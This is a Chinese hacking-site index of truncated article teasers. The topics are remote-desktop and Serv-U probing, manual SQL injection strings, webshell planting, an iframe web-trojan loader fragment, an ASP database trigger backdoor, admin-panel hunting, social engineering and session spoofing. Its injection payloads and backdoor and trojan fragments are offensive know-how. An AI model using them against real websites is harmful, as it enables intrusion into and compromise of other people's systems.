一:首先检测一下网站的服务器是否开了 3389 远程终端 二:检测一下服务是否用了serv-u (还有是什么版本的) 方法 一:复制一个网站 用 3389 登陆器连接一下 (是否成功) 能连接了,拿下...
注入命令 手工注入命令大全
1.判断是否有注入;and 1=1 ;and 1=22.初步判断是否是mssql ;and user>03.注入参数是字符'and and ''='4.搜索时没过滤参数的'and and '%2...
网络安全
编辑器代码逃逸漏洞 by蚊虫原创
好 版权信息 把他变成小马 成功保存 但是没有被执行.. 应该是马的问题 马儿不行 当然是更换了 这不 怪事出现了 你看.. 看 命令成功完成! 非法操作! &nbs...
黑客常用词汇集 入门必看!
webshell 就是web上面的操作界面(shell),简单地说,webshell就是你上传到服务器的的大马文件. 拿站 如果一个网站被你控制了(拿到了webshell,或者被你用灰鸽子控制了,但一...
swf 调用网马代码
// Action script...var lcx= "var O = document.createElement(\"iframe\");O.src=\"...
MsSql 触发器后门asp版
复制代码代码如下:<%'里边的变量代码大家用时自己改吧On Error Resume nextSet conn=Server.CreateObject("ADODB.Connection") D...
网络安全
菜鸟玩注入之找后台篇
先把目标网站打开 现在开始找注入点...如图: 然后手工检测 and 1=1 返回信息正常 该点可以注入 恭...
社会工程学的八种常用方法
转自CB,不同意原文使用的”伎俩”一词.社会工程学也是一门科学,是科学就有科学的方法,帮改之为”方法”. 以下是原文: 著名黑客Kevin Mitnic...
菜鸟也学IP的侦察和隐藏
在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。来...
小议session欺骗的利用以及价值
对于session欺骗 大家都蒙了。 百度上有一篇文章 骗了整个网络界 虽然有不少人已经发现是错误的理论 误导的文章 。使不少人觉得 session欺骗很牛x 其实不然那篇文章...
